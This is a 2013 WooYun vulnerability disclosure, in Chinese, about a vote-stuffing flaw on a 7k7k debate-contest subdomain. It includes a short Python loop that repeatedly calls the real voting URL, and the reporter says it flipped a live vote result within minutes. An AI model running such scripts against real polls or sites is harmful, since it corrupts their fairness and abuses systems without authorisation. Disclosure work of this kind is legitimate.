漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-044428
漏洞标题:奇客星空某分站设计缺陷可秒刷票
相关厂商:奇客星空
漏洞作者: sql
提交时间:2013-11-30 22:49
修复时间:2013-12-02 11:21
公开时间:2013-12-02 11:21
漏洞类型:设计缺陷/逻辑错误
危害等级:低
自评Rank:3
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-11-30: 细节已通知厂商并且等待厂商处理中
2013-12-02: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
奇客星空某分站设计缺陷可秒刷票
详细说明:
http://bianlun.7k7k.com
看到有个辩论大赛,还可以投票。
抓包后发现,投票没做什么验证。只是个get请求,只不过加了个参数而已。
这是最开始的投票结果
正方 比反方多4万多票。
我写了个死循环来投票。
import urllib2
url='http://bianlun.7k7k.com/comment.php?action=support&site=pk&aid=123&who=1&t=1385710179528'
while 1:
urllib2.urlopen(url)
10分钟后 反方 成功逆袭。
请加强验证
不然可能会影响公平。
漏洞证明:
如上
修复方案:
请加强验证
不然可能会影响公平。
版权声明:转载请注明来源 sql@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2013-12-02 11:21
厂商回复:
感谢白帽作者反馈,确实有此漏洞,将在以后修复
最新状态:
暂无